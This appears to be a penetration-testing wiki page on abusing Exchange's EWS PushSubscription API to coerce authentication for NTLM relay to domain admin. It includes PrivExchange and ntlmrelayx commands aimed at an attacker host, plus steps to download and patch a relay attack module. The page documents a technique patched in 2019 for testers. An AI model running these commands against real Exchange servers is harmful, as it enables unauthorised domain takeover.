# PushSubscription abuse

## Theory

"PushSubscription" is an Exchange Web Services (EWS) API that allows a client to subscribe to push notifications. Attackers abuse it to make Exchange servers authenticate to a target of their choosing. **The coerced authentication is made over HTTP**, which is particularly powerful when doing [NTLM relay](broken://pages/PFGlaZOk9WQQxTsZmSJ0) ([because of the Session Signing and MIC mitigations](broken://pages/PFGlaZOk9WQQxTsZmSJ0#mic-message-integrity-code)). As Exchange servers usually have high privileges in a domain (e.g. `WriteDacl` on the domain object, see [Abusing ACLs](broken://pages/4BIFRCf5fXqahfOIAeGb)), the coerced authentication can then be relayed and abused to obtain domain admin privileges (see [NTLM Relay](broken://pages/PFGlaZOk9WQQxTsZmSJ0) and [Kerberos Unconstrained Delegations](/ad/movement/kerberos/delegations.md#unconstrained-delegations-kud)).

## Practice

[PrivExchange](https://github.com/dirkjanm/privexchange/) (Python) is a tool that logs in to Exchange Web Services and calls that API.

```bash
# double quotes so the shell expands the variables (single quotes would pass them literally)
privexchange.py -d "$DOMAIN" -u "$DOMAIN_USER" -p "$PASSWORD" -ah "$ATTACKER_IP" "$EXCHANGE_SERVER_TARGET"
```

{% hint style="info" %}
In the situation where the tester doesn't have any credentials, it is still possible to [relay an authentication](broken://pages/PFGlaZOk9WQQxTsZmSJ0) to make the API call.

The modified [httpattack.py](https://github.com/dirkjanm/PrivExchange/blob/master/httpattack.py) can be used with ntlmrelayx.py to perform this attack. The attacker host is hard-coded in the script and needs to be edited before use.

```bash
# replace impacket's httpattack.py with the PrivExchange version
cd /PATH/TO/impacket/impacket/examples/ntlmrelayx/attacks/
mv httpattack.py httpattack.py.old
wget https://raw.githubusercontent.com/dirkjanm/PrivExchange/master/httpattack.py
# the attacker URL is hard-coded in the script: point it at the attacker host
sed -i "s|attacker_url = .*|attacker_url = \"$ATTACKER_URL\"|" httpattack.py
# reinstall impacket so ntlmrelayx.py picks up the modified attack module
cd /PATH/TO/impacket
pip3 install .
ntlmrelayx.py -t https://exchange.server/EWS/Exchange.asmx
```

{% endhint %}

{% hint style="warning" %}
On February 12th 2019, Microsoft released updates for Exchange which resolved:

* the coerced authentication issue
* the fact that Exchange servers had excessive permissions, allowing an attacker to achieve full domain compromise.
{% endhint %}

## References

{% embed url="https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/" %}
